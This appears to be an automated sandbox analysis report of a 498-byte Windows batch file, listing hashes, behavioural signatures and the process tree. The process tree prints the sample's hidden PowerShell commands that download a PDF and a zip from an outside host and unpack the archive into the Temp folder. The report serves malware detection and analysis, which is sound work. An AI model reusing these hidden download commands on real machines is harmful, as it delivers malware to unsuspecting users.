Analysis
-
max time kernel
119s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05-01-2025 07:55
Static task
static1
Behavioral task
behavioral1
Sample
e8dfdb915a523a09e139aaa900991ddd.bat
Resource
win7-20240903-en
General
-
Target
e8dfdb915a523a09e139aaa900991ddd.bat
-
Size
498B
-
MD5
e8dfdb915a523a09e139aaa900991ddd
-
SHA1
d23f4798c549bfb7ddd968c4c2a971f67468a662
-
SHA256
91619737b3f7af4623dc62b4f3df7b551337ec94f693a3b9ba35bb231483393e
-
SHA512
b4e737d1c80420688bf856df02a580b691d120307b7d31ea4766448ccd0c6eec7b2c48424691e92dffba58ca8c9a8df989f5b683d9363cac37d3dd3e5ad1623e
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 2252 powershell.exe 1064 powershell.exe 2152 powershell.exe 2252 powershell.exe 1064 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2252 powershell.exe 1064 powershell.exe 2152 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2252 powershell.exe Token: SeDebugPrivilege 1064 powershell.exe Token: SeDebugPrivilege 2152 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 3008 wrote to memory of 2252 3008 cmd.exe 29 PID 3008 wrote to memory of 2252 3008 cmd.exe 29 PID 3008 wrote to memory of 2252 3008 cmd.exe 29 PID 3008 wrote to memory of 1064 3008 cmd.exe 30 PID 3008 wrote to memory of 1064 3008 cmd.exe 30 PID 3008 wrote to memory of 1064 3008 cmd.exe 30 PID 3008 wrote to memory of 2152 3008 cmd.exe 31 PID 3008 wrote to memory of 2152 3008 cmd.exe 31 PID 3008 wrote to memory of 2152 3008 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\e8dfdb915a523a09e139aaa900991ddd.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\Admin\Downloads\W2.pdf"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\Admin\AppData\Local\Temp\msword.zip"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\msword -Force"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ed96b1d3f1b0e7b7363427415e358c81
SHA1bee8a0ca6b9cf068057b01a5788b26b82df00240
SHA2564c642238dc07d37f7776ed90123d9d963be045035246e486232b8c2397043724
SHA512fb05ebee076b34ba5946d12ac194e49a72523e5af94893c7d52367474dbb2eb20cc32896676fcd25f00826c09524299ba81c3d13edbd5ebf64d14a15c3ce7dbc